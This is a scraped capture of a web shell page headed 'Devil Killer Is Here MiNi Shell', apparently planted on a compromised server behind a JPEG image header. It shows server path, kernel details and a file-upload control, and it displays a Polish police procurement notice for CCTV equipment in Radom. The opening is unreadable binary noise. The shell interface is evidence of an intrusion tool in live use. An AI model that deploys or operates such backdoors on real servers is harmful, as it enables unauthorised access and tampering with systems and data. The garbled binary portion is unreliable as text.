JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251009/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20251009/0046690601-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup wraz z dostarczeniem sprzętu do CCTV dla potrzeb jednostek Policji garnizonu mazowieckiego – umowa ramowa </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Komenda Wojewódzka Policji z siedzibą w Radomiu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 670897379</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">11 Listopada 37/59</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Radom</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL921 - Radomski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">47 701 40 80</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.kwp@ra.policja.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.mazowiecka.policja.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Umowy ramowej </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup wraz z dostarczeniem sprzętu do CCTV dla potrzeb jednostek Policji garnizonu mazowieckiego – umowa ramowa </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9847bc74-cc75-4128-9340-a730ef8348f3</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00466906</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-10-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00058306/34/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.21 Zakup wraz z dostarczeniem sprzętu do CCTV dla potrzeb jednostek Policji garnizonu mazowieckiego z podziałem na zadanie nr 1 i nr 2 – umowa ramowa.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.17.) Tryb zawarcia umowy ramowej wraz z podstawą prawną</h3> <p class="mb-0"> Umowa ramowa udzielana jest w trybie podstawowym na podstawie: art. 311 ust. 1 pkt 2 ustawy w zw. z art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/kwp_radom <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/kwp_radom</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/kwp_radom.<br/>2.	W postępowaniu o udzielenie zamówienia komunikacja między zamawiającym a wykonawcami odbywa się drogą elektroniczną przy użyciu platformy zakupowej pod adresem: https://platformazakupowa.pl/pn/kwp_radom (inna niż oferta wykonawcy i załączniki do oferty) za pośrednictwem dedykowanego formularza poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po którym pojawi się komunikat, że wiadomość została wysłana do Zamawiającego.<br/>3.	We wszelkiej korespondencji związanej z niniejszym postępowaniem zamawiający i wykonawcy posługują się numerem ogłoszenia z BZP a dodatkowo numerem wewnętrznym postępowania.<br/>4.	Wykonawca ma dostęp do formularza „Wyślij wiadomość do zamawiającego” dostępny na stronie dotyczącej danego postępowania.<br/>5.	Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert zamawiający będzie zamieszczał na platformie w sekcji „Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem https://platformazakupowa.pl/pn/kwp_radom do konkretnego wykonawcy.<br/>6.	Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na https://platformazakupowa.pl/pn/kwp_radom przesłanych przez zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie może trafić do folderu SPAM.<br/>7.	Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przy użyciu środków komunikacji elektronicznej, określają „REGULAMIN platformazakupowa.pl”, który znajduje się na stronie głównej Platformy oraz „Instrukcja dla Wykonawców platformazakupowa.pl” dostępna jest pod adresem: https://platformazakupowa.pl/strona/45-instrukcje.<br/>8.	Maksymalny rozmiar jednego pliku przesyłanego za pomocą dedykowanego formularza przy komunikacji to maksymalnie 500 MB. <br/>9.	Zamawiający może również komunikować się z wykonawcami za pomocą poczty elektronicznej, e-mail: monika.gluch@ra.policja.gov.pl <br/>10. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej, wskazanej w SWZ w tym w przypadku zaistnienia jednej z sytuacji określonych w art. 65 ust. 1, art. 66 i art. 69.<br/>11.	Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452), określa niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:<br/>a)	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b)	komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych – MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c)	zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10.0,<br/>d)	włączona obsługa JavaScript,<br/>e)	zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf, <br/>f)	platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>g)	oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>Z uwagi na ograniczoną ilość znaków , pełna informacja w powyższym zakresie zawarta jest w SWZ zamieszczonej pod adresem<br/>https://platformazakupowa.pl/pn/kwp_radom</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.13. Zamawiający przewiduje pobranie ze złożonych katalogów elektronicznych danych potrzebnych do sporządzenia ofert dostosowanych do wymagań danego zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Dane osobowe przetwarzane w trybie RODO w KWP z siedzibą w Radomiu (postępowanie o udzielenie zamówienia publicznego):<br/>Szanowna Pani/Szanowny Panie, w związku z wejściem w życie rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) z dnia 27 kwietnia 2016 r. (Dz. Urz. UE. L Nr 119, str. 1), dalej „RODO”, dochowując warunków w nim zawartych informujemy, że:<br/>1.	Administratorem Pani/Pana danych osobowych jest Komendant Wojewódzki Policji z siedzibą w Radomiu - adres: ul. 11-go Listopada 37/59, 26-600 Radom.<br/>2.	Nadzór nad prawidłowym przetwarzaniem danych osobowych w Komendzie Wojewódzkiej Policji z siedzibą w Radomiu sprawuje inspektor ochrony danych: Sylwia Fila - adres: ul. 11-go Listopada 37/59, 26-600 Radom - e-mail: iod.kwp@ra.policja.gov.pl.<br/>3.	Cel i okres przetwarzania danych osobowych w Komendzie Wojewódzkiej Policji z siedzibą w Radomiu.<br/>W KWP z siedzibą w Radomiu dane osobowe przetwarza się wyłącznie w konkretnych, wyraźnych i prawnie uzasadnionych celach i nie przetwarza się ich dalej w sposób niezgodny z tymi celami. Przetwarzanie danych jest niezbędne do wypełnienia obowiązku prawnego ciążącego na administratorze (art. 6 ust.1 lit. c RODO) zgodnie z:<br/>-	Ustawą z dnia 11 września 2019 r. Prawo zamówień publicznych – dalej zwaną ustawą Pzp,<br/>-	Rozporządzeniem Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy, oraz Rozporządzeniem Ministra Rozwoju, Pracy <br/>i Technologii z dnia 3 sierpnia 2023 r. zmieniającym rozporządzenie w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy, <br/>-	Dyrektywą Parlamentu Europejskiego i Rady 2014/24/UE z dnia 26 lutego 2014 r. w sprawie zamówień publicznych, uchylająca dyrektywę 2004/18/WE.<br/>Okres przetwarzania danych osobowych wynika bezpośrednio z przepisów prawa i jest adekwatny do celów.<br/>4.	Odbiorcy danych osobowych.<br/>W rozumieniu RODO odbiorcami danych osobowych nie są organy publiczne, które mogą otrzymywać dane osobowe w ramach konkretnego postępowania zgodnie z prawem Unii lub prawem państwa członkowskiego. Dane osobowe nie są udostępniane podmiotom innym niż uprawnione na podstawie przepisów prawa. Dane będą udostępniane uprawnionym podmiotom jedynie w celu umożliwienia korzystania ze środków ochrony prawnej oraz tylko do upływu terminu na ich wniesienie.<br/>5.	Osobom, których dane są przetwarzane zgodnie z RODO przysługuje:<br/>-	prawo dostępu do własnych danych osobowych na zasadach określonych w ustawie Pzp,<br/>-	prawo do żądania od administratora sprostowania, uzupełnienia danych, jednak nie może ono skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą Pzp, <br/>-	prawo do ograniczenia przetwarzania własnych danych osobowych, ale to nie może ograniczać przetwarzania danych osobowych do czasu zakończenia postępowania, <br/>-	prawo do wniesienia sprzeciwu wobec przetwarzania w sytuacjach przewidzianych prawem,<br/>-	prawo do wniesienia skargi do organu nadzorczego, którym jest Prezes Urzędu Ochrony Danych Osobowych, w przypadku uznania, że przetwarzanie danych osobowych narusza przepisy RODO.<br/>6.	Przy przetwarzaniu danych osobowych w trybie RODO nie występuje zautomatyzowane podejmowanie decyzji o przetwarzaniu danych osobowych, w tym profilowanie.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">51/25</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.7.) Wartość umowy ramowej (bez VAT): <span class="normal"> 523100,33 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> V.1. Przedmiotem zamówienia jest zakup wraz z dostarczeniem sprzętu do CCTV dla potrzeb jednostek Policji garnizonu mazowieckiego na zadanie nr 1 – umowa ramowa- zgodnego z Opisem Przedmiotu Zamówienia (OPZ) – stanowiącym załącznik nr 5.1 do SWZ.<br/>Zadanie nr 1 – Panel wizyjny, rejestratory wraz z dyskami, kamery<br/>Oferowane przez Wykonawcę przedmioty zamówienia są fabrycznie nowe oraz wolne od wad fizycznych i prawnych. Przez wadę fizyczną należy rozumieć również jakąkolwiek niezgodność z Opisem przedmiotu zamówienia.<br/>Oferowane przez Wykonawcę przedmioty zamówienia muszą być fabrycznie nowe, wolne od wad fizycznych i prawnych oraz spełniać minimalne wymagania określone w poszczególnych charakterystykach Opisu przedmiotu zamówienia (OPZ) i zostać objętym co najmniej minimalnym okresem gwarancji. Zasady serwisu i gwarancji zostały szczegółowo opisane w poszczególnych częściach OPZ/tabeli porównawczej oferowanego sprzętu, który jednocześnie będzie stanowił integralną część do Umowy. <br/>Ilekroć przedmiot zamówienia został opisany poprzez odniesienie do norm, europejskich ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 i ust. 3 ustawy Pzp. Zamawiający wskazuje, że dopuszczalne są rozwiązania równoważne opisywanym, a odniesieniu takiemu towarzyszą wyrazy „lub równoważne”. W przypadku natomiast odniesienia i jednoczesnego braku wskazanych wyrazów „lub równoważne” Zamawiający wymaga aby każdorazowo traktować takie odniesienia w taki sposób jakby towarzyszyły im wyrazy „lub równoważne”. <br/>Zamawiający określił kryteria równoważności, tj. wybrane cechy przedmiotu zamówienia. <br/>Zamawiający dopuszczając równoważność sprecyzował zakres minimalnych parametrów, w oparciu o które dokona oceny spełnienia wymagań określonych w SWZ. Równoważność należy przyjmować z uwzględnieniem parametrów istotnych nie gorszych, niż wynikające z norm, europejskich ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych przy pomocy, których dokonano opisu przedmiotu zamówienia, w szczególności uwzględniając dane wskazane w Opisie przedmiotu zamówienia (OPZ)/ tabeli porównawczej oferowanego sprzętu Przy ocenie równoważności zaoferowanego rozwiązania należy kierować się przeznaczeniem oraz funkcją wynikającą z dokumentacji, zapotrzebowania i przeznaczenia użytkowego.<br/><br/>Okres gwarancji: Wykonawca udziela gwarancji na oferowane przedmioty zamówienia określone w OPZ na okres zgodny z okresem wskazanym w Formularzu ofertowym licząc od daty podpisania bez zastrzeżeń protokołu odbioru przedmiotu umowy.<br/>Minimalny wymagany okres udzielonej gwarancji wynosi 24 miesiące, maksymalnie punktowany 60 miesięcy. W zakresie sprzętu wymienionego w pozycji 2 oraz 3 OPZ/ tabeli porównawczej oferowanego sprzętu dla zadania nr 1 wymaga się, aby w przypadku zabrania sprzętu przez Wykonawcę w celu naprawy, dysk twardy oraz ewentualne elementy zawierające nośniki danych pozostały u Zamawiającego. Dysk w przypadku awarii pozostaje u Zamawiającego z zastrzeżeniem, że w okresie trwania gwarancji Wykonawca ma możliwość zdiagnozowania dysku w KWP bez możliwości jego testowania poza siedzibą Zamawiającego.<br/><br/>Szczegółowy opis przedmiotu zamówienia określony został w:<br/>	Projektowanych postanowieniach umowy ramowej – stanowiący Załącznik nr 1 do SWZ;<br/>	Formularzu ofertowym do umowy ramowej dla zadania nr 1 – stanowiącym Załącznik nr 2.1 do SWZ;<br/>	Formularzu ofertowym do umowy wykonawczej dla zadania nr 1 – stanowiącym Załącznik nr 4.1 do SWZ;<br/>	Opisie przedmiotu zamówienia dla zadania nr 1 – stanowiącym Załącznik nr 5.1 do SWZ<br/>	Projektowanych postanowieniach umowy wykonawczej– stanowiący Załącznik nr 6 do SWZ </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 470502,83 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">32333100-7 - Rejestratory obrazu wideo</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">32332000-9 - Rejestratory z taśmą magnetyczną</p> <p class="mb-0">30234100-9 - Dysk magnetyczny</p> <p class="mb-0">30231300-0 - Monitory ekranowe</p> <p class="mb-0">30237260-9 - Wsporniki do montowania monitorów na ścianie</p> <p class="mb-0">32581100-0 - Kabel do transmisji danych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">18 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu oceny Zamawiający posłuży się następującymi wzorami:<br/><br/>	dla kryterium - Cena brutto oferty „C”: <br/><br/>C=C_N/C_O x60 pkt.<br/><br/>gdzie:<br/>C - wartość punktowa przyznana ocenianej ofercie w kryterium „Cena”, <br/>CN - najniższa cena ofertowa (brutto) spośród wszystkich ofert podlegających ocenie, <br/>Co - cena oferty ocenianej (brutto). <br/>Uzyskana liczba punktów w ramach kryterium „Cena” zaokrąglana będzie do drugiego miejsca po przecinku.<br/>dla kryterium - Okres udzielonej gwarancji „G” (wyrażony w pełnych miesiącach - liczbie całkowitej), powyżej minimalnych warunków (wymagane minimum 24 miesiące). <br/>W kryterium - „Okres udzielonej gwarancji” oceniany będzie zadeklarowany (tzn. wpisany w treści Formularza ofertowego) przez Wykonawcę czas obowiązywania gwarancji na dostarczony sprzęt.<br/>Minimalny wymagany „Okres udzielonej gwarancji” wynosi 24 miesiące, maksymalnie punktowany - 60 miesięcy, licząc od daty podpisania bez zastrzeżeń protokołu odbioru przedmiotu zamówienia. W przypadku gdy Wykonawca zadeklaruje „Okres udzielonej gwarancji” dłuższy niż 60 miesięcy, ocenie będzie podlegał okres 60 miesięcy.<br/>Natomiast w przypadku gdy Wykonawca zadeklaruje „Okres udzielonej gwarancji” krótszy niż 24 miesiące oferta Wykonawcy będzie podlegała odrzuceniu.<br/>Punktacja Wykonawcom przypisana zostanie odpowiednio według poniższych wytycznych:<br/>	oferta zawierająca deklarowany „Okres udzielonej gwarancji” - w przedziale <br/>≥ 24 ≤ 35 miesięcy - 0 punktów;<br/>	oferta zawierająca deklarowany „Okres udzielonej gwarancji” - w przedziale ≥ 36 ≤ 47 miesięcy - 10 punktów;<br/>	oferta zawierająca deklarowany „Okres udzielonej gwarancji” - w przedziale ≥ 48 ≤ 59 miesięcy - 15 punktów;<br/>	oferta zawierająca deklarowany „Okres udzielonej gwarancji” - w przedziale ≥ 60 miesięcy - 20 punktów.<br/>Zakres udzielonej gwarancji przez cały oferowany okres musi być tożsamy z zakresem wymaganej 24 miesięcznej gwarancji. W przypadku niewpisania okresu gwarancji należy przyjąć, że Wykonawca zaoferował minimalny „okres gwarancji”, tj. 24 miesiące.<br/>W zakresie sprzętu wymienionego w pozycji 2 oraz 3 OPZ/ tabeli porównawczej oferowanego sprzętu dla zadania nr 1 wymaga się, aby w przypadku zabrania sprzętu przez Wykonawcę w celu naprawy, dysk twardy oraz ewentualne elementy zawierające nośniki danych pozostały u Zamawiającego. Dysk w przypadku awarii pozostaje u Zamawiającego z zastrzeżeniem, że w okresie trwania gwarancji Wykonawca ma możliwość zdiagnozowania dysku w KWP bez możliwości jego testowania poza siedzibą Zamawiającego.<br/><br/>	dla kryterium – Termin dostawy „D” (wyrażony w pełnych dniach kalendarzowych – liczbie całkowitej)<br/><br/>Kryterium - „Termin dostawy” będzie oceniane na podstawie zadeklarowanego przez Wykonawcę w treści Formularza ofertowego „Terminu dostawy”.<br/>Wykonawca zobowiązany jest wypełnić Formularz ofertowy - odpowiednio wpisać do rubryki Formularza ofertowego &lt;Termin dostawy&gt; liczbę dni kalendarzowych, jednak nie dłużej niż 30 dni, w jakim Wykonawca zobowiązuje się dostarczyć przedmiot umowy. <br/><br/>Przy przyznawaniu i przeliczaniu punktów będą brane pod uwagę tylko te oferty, w których zostanie zaproponowany termin realizacji nie dłuższy niż 30 dni kalendarzowych.<br/>Proponowane przyznawanie i przeliczanie punktów w ramach tego kryterium wyboru ofert:<br/>	oferta zawierająca w przedziale 1 ÷ 14 dni kalendarzowych deklarowanego „Terminu dostawy” – 20 punktów;<br/>	oferta zawierająca w przedziale 15 ÷ 20 dni kalendarzowych deklarowanego „Terminu dostawy” – 15 punktów;<br/>	oferta zawierająca w przedziale 21 ÷ 25 dni kalendarzowych deklarowanego „Terminu dostawy” – 10 punktów;<br/>	oferta zawierająca w przedziale 26 ÷ 29 dni kalendarzowych deklarowanego „Terminu dostawy” – 5 punktów;<br/>	oferta zawierająca 30 dni kalendarzowych deklarowanego „Terminu dostawy” – 0 punktów.<br/>Z uwagi na ograniczoną ilość znaków , pełna informacja w powyższym zakresie zawarta jest w SWZ zamieszczonej pod 